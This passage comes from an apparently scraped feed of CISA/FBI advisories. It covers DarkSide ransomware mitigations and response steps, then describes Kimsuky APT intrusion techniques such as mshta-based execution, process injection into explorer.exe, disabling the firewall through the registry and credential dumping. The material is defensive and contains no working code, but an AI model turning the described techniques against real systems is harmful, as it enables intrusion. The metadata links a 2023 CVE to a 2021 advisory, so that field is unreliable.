CISA and FBI recommend removing any application not deemed necessary for day-to-day operations.\n * **(Updated July 08, 2021)**: Click here for downloadable IOCs associated with a sample of a DarkSide ransomware variant analyzed by CISA and FBI. Note: CISA and FBI have no evidence that this sample is related to the pipeline incident detailed in this CSA. This variant executes a dynamic-link library (DLL) program used to delete Volume Shadow copies available on the system. The malware collects, encrypts, and sends system information to the threat actor\u2019s command and control (C2) domains and generates a ransom note to the victim. For more information about this variant, refer to Malware Analysis Report [MAR-10337802-1.v1: DarkSide Ransomware](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-189a>). \n\nClick here for a PDF version of this report.\n\n### Technical Details\n\n_**Note**: the analysis in this Joint Cybersecurity Advisory is ongoing, and the information provided should not be considered comprehensive. CISA and FBI will update this advisory as new information is available._\n\nAfter gaining initial access to the pipeline company\u2019s network, DarkSide actors deployed DarkSide ransomware against the company\u2019s IT network. In response to the cyberattack, the company has reported that they proactively disconnected certain OT systems to ensure the systems\u2019 safety.[[2](<https://www.colpipe.com/news/press-releases/media-statement-colonial-pipeline-system-disruption>)] At this time, there are no indications that the threat actor moved laterally to OT systems.\n\nDarkSide is ransomware-as-a-service (RaaS)\u2014the developers of the ransomware receive a share of the proceeds from the cybercriminal actors who deploy it, known as \u201caffiliates.\u201d According to open-source reporting, since August 2020, DarkSide actors have been targeting multiple large, high-revenue organizations, resulting in the encryption and theft of sensitive data. 
The DarkSide group has publicly stated that they prefer to target organizations that can afford to pay large ransoms instead of hospitals, schools, non-profits, and governments.[[3](<https://securitynews.sonicwall.com/xmlpost/darkside-ransomware-targets-large-corporations-charges-up-to-2m/>)],[[4](<https://www.varonis.com/blog/darkside-ransomware/>)]\n\nAccording to open-source reporting, DarkSide actors have previously been observed gaining initial access through phishing and exploiting remotely accessible accounts and systems and Virtual Desktop Infrastructure (VDI) (_Phishing_ [[T1566](<https://attack.mitre.org/versions/v9/techniques/T1566/>)], _Exploit Public-Facing Application_ [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190/>)], _External Remote Services_ [[T1133](<https://attack.mitre.org/versions/v9/techniques/T1133/>)]).[[5](<https://www.bankinfosecurity.com/fbi-darkside-ransomware-used-in-colonial-pipeline-attack-a-16555>)],[[6](<https://www.varonis.com/blog/darkside-ransomware/>)] DarkSide actors have also been observed using Remote Desktop Protocol (RDP) to maintain _Persistence_ [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003/>)].[[7](<https://www.varonis.com/blog/darkside-ransomware/>)]\n\nAfter gaining access, DarkSide actors deploy DarkSide ransomware to encrypt and steal sensitive data (_Data Encrypted for Impact_ [[T1486](<https://attack.mitre.org/techniques/T1486/>)]). 
The actors then threaten to publicly release the data if the ransom is not paid.[[8](<https://securitynews.sonicwall.com/xmlpost/darkside-ransomware-targets-large-corporations-charges-up-to-2m/>)],[[9](<https://www.varonis.com/blog/darkside-ransomware/>)] The DarkSide ransomware uses Salsa20 and RSA encryption.[[10](<https://www.mcafee.com/enterprise/en-us/threat-center/threat-landscape-dashboard/ransomware-details.darkside-ransomware.html>)]\n\nDarkSide actors primarily use [The Onion Router (TOR)](<https://attack.mitre.org/software/S0183/>) for _Command and Control (C2)_ [[TA0011](<https://attack.mitre.org/versions/v9/tactics/TA0011/>)] (_Proxy: Multi-hop Proxy_ [[T1090.003](<https://attack.mitre.org/versions/v9/techniques/T1090/003/>)]).[[11](<https://securitynews.sonicwall.com/xmlpost/darkside-ransomware-targets-large-corporations-charges-up-to-2m/>)],[[12](<https://www.varonis.com/blog/darkside-ransomware/>)] The actors have also been observed using [Cobalt Strike](<https://attack.mitre.org/versions/v9/software/S0154/>) for C2.[[13](<https://www.mcafee.com/enterprise/en-us/threat-center/threat-landscape-dashboard/ransomware-details.darkside-ransomware.html>)]\n\n### Mitigations\n\nCISA and FBI urge CI owners and operators to apply the following mitigations to reduce the risk of compromise by ransomware attacks.\n\n * **Require multi-factor authentication** for remote access to OT and IT networks.\n * **Enable strong spam filters to prevent phishing emails from reaching end users**. Filter emails containing executable files from reaching end users.\n * **Implement a user training program and simulated attacks for spearphishing** to discourage users from visiting malicious websites or opening malicious attachments and re-enforce the appropriate user responses to spearphishing emails.\n * **Filter network traffic** to prohibit ingress and egress communications with known malicious IP addresses. 
Prevent users from accessing malicious websites by implementing URL blocklists and/or allowlists.\n * **Update software**, including operating systems, applications, and firmware on IT network assets, in a timely manner. Consider using a centralized patch management system; use a risk-based assessment strategy to determine which OT network assets and zones should participate in the patch management program.\n * **Limit access to resources over networks, especially by restricting RDP**. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources and require multi-factor authentication.\n * **Set antivirus/antimalware programs to conduct regular scans** of IT network assets using up-to-date signatures. Use a risk-based asset inventory strategy to determine how OT network assets are identified and evaluated for the presence of malware.\n * **Implement unauthorized execution prevention by**: \n * **Disabling macro scripts from Microsoft Office files** transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications.\n * **Implementing application allowlisting**, which only allows systems to execute programs known and permitted by security policy. Implement software restriction policies (SRPs) or other controls to prevent programs from executing from common ransomware locations, such as temporary folders supporting popular internet browsers or compression/decompression programs, including the `AppData/LocalAppData` folder.\n * **Monitor and/or block inbound connections from Tor exit nodes and other anonymization services** to IP addresses and ports for which external connections are not expected (i.e., other than VPN gateways, mail ports, web ports). 
For more guidance, refer to Joint Cybersecurity Advisory [AA20-183A: Defending Against Malicious Cyber Activity Originating from Tor](<https://us-cert.cisa.gov/ncas/alerts/aa20-183a>).\n * **Deploy signatures to detect and/or block inbound connection from Cobalt Strike servers** and other post exploitation tools.\n\nCISA and FBI urge CI owners and operators to apply the following mitigations now to reduce the risk of severe business or functional degradation should their CI entity fall victim to a ransomware attack in the future.\n\n * **Implement and ensure robust network segmentation between IT and OT networks** to limit the ability of adversaries to pivot to the OT network even if the IT network is compromised. Define a demilitarized zone that eliminates unregulated communication between the IT and OT networks.\n * **Organize OT assets into logical zones** by taking into account criticality, consequence, and operational necessity. Define acceptable communication conduits between the zones and deploy security controls to filter network traffic and monitor communications between zones. Prohibit industrial control system (ICS) protocols from traversing the IT network.\n * **Identify OT and IT network inter-dependencies and develop workarounds or manual controls** to ensure ICS networks can be isolated if the connections create risk to the safe and reliable operation of OT processes. Regularly test contingency plans such as manual controls so that safety-critical functions can be maintained during a cyber incident. Ensure that the OT network can operate at necessary capacity even if the IT network is compromised. \n * **Regularly test manual controls** so that critical functions can be kept running if ICS or OT networks need to be taken offline.\n * **Implement regular data backup procedures** on both the IT and OT networks. Backup procedures should be conducted on a frequent, regular basis. 
The data backup procedures should also address the following best practices: \n * **Ensure that backups are regularly tested**.\n * **Store your backups separately**. Backups should be isolated from network connections that could enable the spread of ransomware. It is important that backups be maintained offline as many ransomware variants attempt to find and encrypt or delete accessible backups. Maintaining current backups offline is critical because if your network data is encrypted with ransomware, your organization can restore systems to its previous state. Best practice is to store your backups on a separate device that cannot be accessed from a network, such as on an external hard drive. (See the Software Engineering Institute\u2019s page on [ransomware](<https://insights.sei.cmu.edu/sei_blog/2017/05/ransomware-best-practices-for-prevention-and-response.html>)).\n * **Maintain regularly updated \u201cgold images\u201d of critical systems in the event they need to be rebuilt**. This entails maintaining image \u201ctemplates\u201d that include a preconfigured operating system (OS) and associated software applications that can be quickly deployed to rebuild a system, such as a virtual machine or server.\n * **Retain backup hardware** to rebuild systems in the event rebuilding the primary system is not preferred. Hardware that is newer or older than the primary system can present installation or compatibility hurdles when rebuilding from images.\n * **Store source code or executables**. It is more efficient to rebuild from system images, but some images will not install on different hardware or platforms correctly; having separate access to needed software will help in these cases.\n * **Ensure user and process accounts are limited through account use policies, user account control, and privileged account management**. 
Organize access rights based on the principles of least privilege and separation of duties.\n\nIf your organization is impacted by a ransomware incident, CISA and FBI recommend the following actions:\n\n * **Isolate the infected system**. Remove the infected system from all networks, and disable the computer\u2019s wireless, Bluetooth, and any other potential networking capabilities. Ensure all shared and networked drives are disconnected, whether wired or wireless. \n * **Turn off other computers and devices**. Power-off and segregate (i.e., remove from the network) the infected computer(s). Power-off and segregate any other computers or devices that shared a network with the infected computer(s) that have not been fully encrypted by ransomware. If possible, collect and secure all infected and potentially infected computers and devices in a central location, making sure to clearly label any computers that have been encrypted. Powering-off and segregating infected computers and computers that have not been fully encrypted may allow for the recovery of partially encrypted files by specialists. (See [Before You Connect a New Computer to the Internet](<https://us-cert.cisa.gov/ncas/tips/ST15-003>) for tips on how to make a computer more secure before you reconnect it to a network.)\n * **Secure your backups**. Ensure that your backup data is offline and secure. If possible, scan your backup data with an antivirus program to check that it is free of malware.\n * Refer to Joint Cybersecurity Advisory: [AA20-245A: Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) for more best practices on incident response.\n\n**Note: **CISA and the FBI do not encourage paying a ransom to criminal actors. Paying a ransom may embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or may fund illicit activities. 
Paying the ransom also does not guarantee that a victim’s files will be recovered. CISA and FBI urge you to report ransomware incidents to your [local FBI field office](<http://www.fbi.gov/contact-us/field>).

CISA offers a range of no-cost [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>) to help CI organizations assess, identify, and reduce their exposure to threats, including ransomware. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate attack vectors.

### Resources

 * CISA and MS-ISAC: [Joint Ransomware Guide](<https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware Guide_S508C.pdf>)
 * CISA: [Ransomware page](<https://www.cisa.gov/ransomware>)
 * CISA Tip: [Protecting Against Ransomware](<https://us-cert.cisa.gov/ncas/tips/ST19-001>)
 * CISA: [CISA Ransomware One-Pager and Technical Document](<https://www.us-cert.gov/sites/default/files/publications/Ransomware_Executive_One-Pager_and_Technical_Document-FINAL.pdf>)
 * CISA Insights: [Ransomware Outbreak](<https://www.us-cert.gov/sites/default/files/2019-08/CISA_Insights-Ransomware_Outbreak_S508C.pdf>)
 * CISA: [Pipeline Cybersecurity Initiative](<https://www.cisa.gov/pipeline-cybersecurity-initiative>)
 * CISA Webinar: [Combating Ransomware](<https://www.youtube.com/watch?v=D8kC07tu27A>)
 * CISA: [Cybersecurity Practices for Industrial Control Systems](<https://www.cisa.gov/publication/cybersecurity-best-practices-for-industrial-control-systems>)
 * FBI: [Incidents of Ransomware on the Rise](<https://www.fbi.gov/news/stories/incidents-of-ransomware-on-the-rise/incidents-of-ransomware-on-the-rise>)
 * National Security Agency (NSA): [Stop Malicious Cyber Activity Against Connected Operational Technology](<https://media.defense.gov/2021/Apr/29/2002630479/-1/-1/1/CSA_STOP-MCA-AGAINST-OT_UOO13672321.PDF>)
 * Department of Energy: [Oil and Natural Gas Subsector Cybersecurity Capability Maturity Model](<https://www.energy.gov/sites/prod/files/2014/03/f13/ONG-C2M2-v1-1_cor.pdf>)
 * Transportation Security Agency: [Pipeline Security Guidelines](<https://www.tsa.gov/sites/default/files/pipeline_security_guidelines.pdf>)
 * National Institute of Standards and Technology (NIST): [Framework for Improving Critical Infrastructure Cybersecurity](<https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf>)
 * NIST: [Ransomware Protection and Response](<https://csrc.nist.gov/projects/ransomware-protection-and-response>)
 * NIST: [Data Integrity: Identifying and Protecting Assets Against Ransomware and Other Destructive Events](<https://www.nccoe.nist.gov/projects/building-blocks/data-integrity/identify-protect>)
 * NIST: [Data Integrity: Detecting and Responding to Ransomware and Other Destructive Events](<https://www.nccoe.nist.gov/projects/building-blocks/data-integrity/detect-respond>)
 * NIST: [Data Integrity: Recovering from Ransomware and Other Destructive Events](<https://www.nccoe.nist.gov/projects/building-blocks/data-integrity/recover>)
 * NIST: [Guide to Industrial Control Systems (ICS) Security](<https://csrc.nist.gov/publications/detail/sp/800-82/rev-2/final>)
 * Software Engineering Institute: [Ransomware: Best Practices for Prevention and Response](<https://insights.sei.cmu.edu/blog/ransomware-best-practices-for-prevention-and-response/>)
 * NIST: [Fact Sheet: How Do I Stay Prepared?](<https://csrc.nist.gov/CSRC/media/Projects/ransomware-protection-and-response/documents/NIST_Tips_for_Preparing_for_Ransomware_Attacks.pdf>)

### Contact Information

Victims of ransomware should report it immediately to CISA at <https://us-cert.cisa.gov/report>, a [local FBI Field Office](<https://www.fbi.gov/contact-us/field-offices>), or a [U.S. Secret Service Field Office](<http://www.secretservice.gov/contact/field-offices/>).
To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [CISAServiceDesk@cisa.dhs.gov](<mailto:CISAServiceDesk@cisa.dhs.gov>).

### Revisions

 * May 11, 2021: Initial Version
 * May 12, 2021: Added additional resources
 * May 19, 2021: Added IOCs
 * July 8, 2021: Added MAR-10337802-1.v1 and associated IOCs

", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-08T12:00:00", "type": "ics", "title": "DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-27350"], "modified": "2021-07-08T12:00:00", "id": "AA21-131A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-131a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-31T15:30:49", "description": "

### Summary

_This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) version 7 framework. See the [ATT&CK for Enterprise version 7](<https://attack.mitre.org/versions/v7/techniques/enterprise/>) for all referenced threat actor tactics and techniques._

This joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the U.S. Cyber Command Cyber National Mission Force (CNMF). This advisory describes the tactics, techniques, and procedures (TTPs) used by North Korean advanced persistent threat (APT) group [Kimsuky](<https://attack.mitre.org/groups/G0094/>)—against worldwide targets—to gain intelligence on various topics of interest to the North Korean government. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit [https://www.us-cert.cisa.gov/northkorea](<https://us-cert.cisa.gov/northkorea>).

This advisory describes known Kimsuky TTPs, as found in open-source and intelligence reporting through July 2020.
The target audience for this advisory is commercial sector businesses desiring to protect their networks from North Korean APT activity.

[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/TLP-WHITE_AA20-301A_North_Korean_APT_Focus_Kimsuky.pdf>) for a PDF version of this report.

#### Key Findings

This advisory’s key findings are:

 * The Kimsuky APT group has most likely been operating since 2012.
 * Kimsuky is most likely tasked by the North Korean regime with a global intelligence gathering mission.
 * Kimsuky employs common social engineering tactics, spearphishing, and watering hole attacks to exfiltrate desired information from victims.[[1](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>)],[[2](<https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829>)]
 * Kimsuky is most likely to use spearphishing to gain initial access into victim hosts or networks.[[3](<https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829>)]
 * Kimsuky conducts its intelligence collection activities against individuals and organizations in South Korea, Japan, and the United States.
 * Kimsuky focuses its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions.
 * Kimsuky specifically targets:
   * Individuals identified as experts in various fields,
   * Think tanks, and
   * South Korean government entities.[[4](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>)],[[5](<https://attack.mitre.org/groups/G0094/>)],[[6](<https://www.securityweek.com/north-korea-suspected-cyber-espionage-attacks-against-south-korean-entities>)],[[7](<https://attack.mitre.org/groups/G0094/>)],[[8](<https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf>)]
 * CISA, FBI, and CNMF
recommend individuals and organizations within this target profile increase their defenses and adopt a heightened state of awareness. Particularly important mitigations include safeguards against spearphishing, use of multi-factor authentication, and user awareness training.

### Technical Details

#### Initial Access

Kimsuky uses various spearphishing and social engineering methods to obtain _Initial Access_ [[TA0001](<https://attack.mitre.org/tactics/TA0001/>)] to victim networks.[[9](<https://blog.malwarebytes.com/threat-analysis/2020/04/apts-and-covid-19-how-advanced-persistent-threats-use-the-coronavirus-as-a-lure/>)],[[10](<https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html>)],[[11](<https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf>)] Spearphishing—with a malicious attachment embedded in the email—is the most observed Kimsuky tactic (_Phishing: Spearphishing Attachment_ [[T1566.001](<https://attack.mitre.org/versions/v7/techniques/T1566/001/>)]).[[12](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>)],[[13](<https://attack.mitre.org/groups/G0094/>)]

 * The APT group has used web hosting credentials—stolen from victims outside of their usual targets—to host their malicious scripts and tools. Kimsuky likely obtained the credentials from the victims via spearphishing and credential harvesting scripts. On the victim domains, they have created subdomains mimicking legitimate sites and services they are spoofing, such as Google or Yahoo mail.[14]
 * Kimsuky has also sent benign emails to targets, which were possibly intended to build trust in advance of a follow-on email with a malicious attachment or link.
   * Posing as South Korean reporters, Kimsuky exchanged several benign interview-themed emails with their intended target to ostensibly arrange an interview date and possibly build rapport. The emails contained the subject line “Skype Interview requests of [Redacted TV Show] in Seoul,” and began with a request to have the recipient appear as a guest on the show. The APT group invited the targets to a Skype interview on the topic of inter-Korean issues and denuclearization negotiations on the Korean Peninsula.
   * After a recipient agreed to an interview, Kimsuky sent a subsequent email with a malicious document, either as an attachment or as a Google Drive link within the body. The document usually contained a variant of BabyShark malware (see the Execution section for information on BabyShark). When the date of the interview drew near, Kimsuky sent an email canceling the interview.
 * Kimsuky tailors its spearphishing and social engineering approaches to use topics relevant to the target, such as COVID-19, the North Korean nuclear program, or media interviews.[[15](<https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829>)],[[16](<https://blog.malwarebytes.com/threat-analysis/2020/04/apts-and-covid-19-how-advanced-persistent-threats-use-the-coronavirus-as-a-lure/>)],[[17](<https://www.cyberscoop.com/north-korea-accelerate-commercial-espionage-meet-kims-economic-deadline/>)]

Kimsuky’s other methods for obtaining initial access include login-security-alert-themed phishing emails, watering hole attacks, distributing malware through torrent sharing sites, and directing victims to install malicious browser extensions (_Phishing: Spearphishing Link_ [[T1566.002](<https://attack.mitre.org/versions/v7/techniques/T1566/002/>)], _Drive-by Compromise_ [[T1189](<https://attack.mitre.org/versions/v7/techniques/T1189/>)], _Man-in-the-Browser_ [[T1185](<https://attack.mitre.org/versions/v7/techniques/T1185/>)]).[[18](<https://attack.mitre.org/groups/G0094/>)]

#### Execution

After obtaining initial access, Kimsuky uses [BabyShark](<https://attack.mitre.org/software/S0414/>) malware and PowerShell or the Windows Command Shell for _Execution_ [[TA0002](<https://attack.mitre.org/versions/v7/tactics/TA0002/>)].

 * BabyShark is Visual Basic Script (VBS)-based malware.
   * First, the compromised host system uses the native Microsoft Windows utility, `mshta.exe`, to download and execute an HTML application (HTA) file from a remote system (_Signed Binary Proxy Execution: Mshta_ [[T1218.005](<https://attack.mitre.org/versions/v7/techniques/T1218/005/>)]).
   * The HTA file then downloads, decodes, and executes the encoded BabyShark VBS file.
   * The script maintains _Persistence_ [[TA0003](<https://attack.mitre.org/versions/v7/tactics/TA0003/>)] by creating a Registry key that runs on startup (_Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder_ [[T1547.001](<https://attack.mitre.org/versions/v7/techniques/T1547/001/>)]).
   * It then collects system information (_System Information Discovery_ [[T1082](<https://attack.mitre.org/versions/v7/techniques/T1082>)]), sends it to the operator’s command and control (C2) servers, and awaits further commands.[[19](<https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829>)],[[20](<https://attack.mitre.org/groups/G0094/>)],[[21](<https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/>)],[[22](<https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/>)]
 * Open-source reporting indicates BabyShark is delivered via an email message containing a link or an attachment (see the Initial Access section for more information) (_Phishing: Spearphishing Link_ [[T1566.002](<https://attack.mitre.org/versions/v7/techniques/T1566/002/>)], _Phishing: Spearphishing Attachment_ [[T1566.001](<https://attack.mitre.org/versions/v7/techniques/T1566/001>)]). Kimsuky tailors email phishing messages to match its targets’ interests. Observed targets have been U.S. think tanks and the global cryptocurrency industry.[[23](<https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829>)]
 * Kimsuky uses PowerShell to run executables from the internet without touching the physical hard disk on a computer by using the target’s memory (_Command and Scripting Interpreter: PowerShell_ [[T1059.001](<https://attack.mitre.org/versions/v7/techniques/T1059/001/>)]). PowerShell commands/scripts can be executed without invoking `powershell.exe` through HTA files or `mshta.exe`.[[24](<https://attack.mitre.org/groups/G0094/>)],[[25](<https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/>)],[[26](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/>)],[[27](<https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/>)]

#### Persistence

Kimsuky has demonstrated the ability to establish _Persistence_ [[TA0003](<https://attack.mitre.org/versions/v7/tactics/TA0003/>)] by using malicious browser extensions, modifying system processes, manipulating the `autostart` execution, using Remote Desktop Protocol (RDP), and changing the default file association for an application.
By using these methods, Kimsuky can gain login and password information and/or launch malware outside of some application allowlisting solutions.

 * In 2018, Kimsuky used an extension, which was available on the Google Chrome Web Store, to infect victims and steal passwords and cookies from their browsers (_Man-in-the-Browser_ [[T1185](<https://attack.mitre.org/versions/v7/techniques/T1185/>)]). The extension’s reviews gave it a five-star rating; however, the text of the reviews applied to other extensions or was negative. The reviews were likely left by compromised Google+ accounts.[[28](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>)]
 * Kimsuky may install a new service that can execute at startup by using utilities to interact with services or by directly modifying the Registry keys (_Boot or Logon Autostart Execution_ [[T1547](<https://attack.mitre.org/versions/v7/techniques/T1547>)]). The service name may be disguised with the name of a related operating system function or by masquerading as benign software. Services may be created with administrator privileges but are executed under system privileges, so an adversary can also use a service to escalate privileges from Administrator to System. They can also directly start services through Service Execution.[[29](<https://attack.mitre.org/groups/G0094/>)],[[30](<https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/>)]
 * During the STOLEN PENCIL operation in May 2018, Kimsuky used the GREASE malware.
GREASE is a tool capable of adding a Windows administrator account and enabling RDP while avoiding firewall rules (_Remote Services: Remote Desktop Protocol_ [[T1021.001](<https://attack.mitre.org/versions/v7/techniques/T1021/001>)]).[[31](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>)]
 * Kimsuky uses a document stealer module that changes the default program associated with Hangul Word Processor (HWP) documents (`.hwp` files) in the Registry (_Event Triggered Execution: Change Default File Association_ [[T1546.001](<https://attack.mitre.org/versions/v7/techniques/T1546/001>)]). Kimsuky manipulates the default Registry setting to open a malicious program instead of the legitimate HWP program (HWP is a Korean word processor). The malware will read and email the content from HWP documents before the legitimate HWP program ultimately opens the document.[[32](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)] Kimsuky also targets Microsoft Office users by formatting their documents in a `.docx` file rather than `.hwp` and will tailor their macros accordingly.[33]
 * Kimsuky maintains access to compromised domains by uploading actor-modified versions of open-source PHP: Hypertext Preprocessor (PHP)-based web shells; these web shells enable the APT actor to upload, download, and delete files and directories on the compromised domains (_Server Software Component: Web Shell_ [[T1505.003](<https://attack.mitre.org/versions/v7/techniques/T1505/003>)]). The actor often adds “Dinosaur” references within the modified web shell code.[34]

#### Privilege Escalation

Kimsuky uses well-known methods for _Privilege Escalation_ [[TA0004](<https://attack.mitre.org/versions/v7/tactics/TA0004/>)].
These methods include placing scripts in the Startup folder, creating and running new services, changing default file associations, and injecting malicious code into `explorer.exe`.

 * Kimsuky has used Win7Elevate—an exploit from the Metasploit framework—to bypass User Account Control (UAC) and inject malicious code into `explorer.exe` (_Process Injection_ [[T1055](<https://attack.mitre.org/versions/v7/techniques/T1055/>)]). This malicious code decrypts its spying library—a collection of keystroke logging and remote control access tools and remote control download and execution tools—from resources, regardless of the victim’s operating system. It then saves the decrypted file to disk with a random but hardcoded name (e.g., `dfe8b437dd7c417a6d.tmp`) in the user’s temporary folder and loads this file as a library, ensuring the tools remain on the system even after a reboot. This allows for the escalation of privileges.[[35](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)]
 * Before the injection takes place, the malware sets the necessary privileges (see figure 1). The malware writes the path to its malicious Dynamic Link Library (DLL) and ensures the remote process is loaded by creating a remote thread within `explorer.exe` (_Process Injection_ [[T1055](<https://attack.mitre.org/versions/v7/techniques/T1055/>)]).[[36](<https://yoroi.company/research/the-north-korean-kimsuky-apt-keeps-threatening-south-korea-evolving-its-ttps/>)]

_Figure 1: Privileges set for the injection_ [[37](<https://yoroi.company/research/the-north-korean-kimsuky-apt-keeps-threatening-south-korea-evolving-its-ttps/>)]

#### Defense Evasion

Kimsuky uses well-known and widely available methods for _Defense Evasion_ [[TA0005](<https://attack.mitre.org/versions/v7/tactics/TA0005/>)] within a network.
These methods include disabling security tools, deleting files, and using Metasploit.[[38](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)],[[39](<https://attack.mitre.org/groups/G0094/>)]

 * Kimsuky’s malicious DLL runs at startup to zero (i.e., turn off) the Windows firewall Registry keys (see figure 2). This disables the Windows system firewall and turns off the Windows Security Center service, which prevents the service from alerting the user about the disabled firewall (_Impair Defenses: Disable or Modify System Firewall_ [[T1562.004](<https://attack.mitre.org/versions/v7/techniques/T1562/004/>)]).[[40](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)]

_Figure 2: Disabled firewall values in the Registry_ [[41](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)]

 * Kimsuky has used a keylogger that deletes exfiltrated data on disk after it is transmitted to its C2 server (_Indicator Removal on Host: File Deletion_ [[T1070.004](<https://attack.mitre.org/versions/v7/techniques/T1070/004/>)]).[[42](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)]
 * Kimsuky has used `mshta.exe`, which is a utility that executes Microsoft HTAs. It can be used for proxy execution of malicious `.hta` files and JavaScript or VBS through a trusted Windows utility (_Signed Binary Proxy Execution: Mshta_ [[T1218.005](<https://attack.mitre.org/versions/v7/techniques/T1218/005>)]). It can also be used to bypass application allowlisting solutions (_Abuse Elevation Control Mechanism: Bypass User Account Control_ [[T1548.002](<https://attack.mitre.org/versions/v7/techniques/T1548/002>)]).[[43](<https://attack.mitre.org/groups/G0094/>)],[[44](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/>)]
 * Win7Elevate—which was noted above—is also used to evade traditional security measures.
Win7Elevate is part of the Metasploit framework’s open-source code and is used to inject malicious code into `explorer.exe` (_Process Injection_ [[T1055](<https://attack.mitre.org/versions/v7/techniques/T1055>)]). The malicious code decrypts its spying library from resources, saves the decrypted file to disk with a random but hardcoded name in the victim’s temporary folder, and loads the file as a library.[[45](<https://www.securityweek.com/north-korea-suspected-cyber-espionage-attacks-against-south-korean-entities>)],[[46](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)],[[47](<https://attack.mitre.org/groups/G0094/>)]

#### Credential Access

Kimsuky uses legitimate tools and network sniffers to harvest credentials from web browsers, files, and keyloggers (_Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v7/tactics/TA0006/>)]).

 * Kimsuky uses memory dump programs instead of well-known malicious software and performs the credential extraction offline. Kimsuky uses `ProcDump`, a Windows command-line administration tool, also available for Linux, that allows a user to create crash dumps/core dumps of processes based upon certain criteria, such as high central processing unit (CPU) utilization (_OS Credential Dumping_ [[T1003](<https://attack.mitre.org/versions/v7/techniques/T1003/>)]). `ProcDump` monitors for CPU spikes and generates a crash dump when a value is met; it passes information to a Word document saved on the computer.
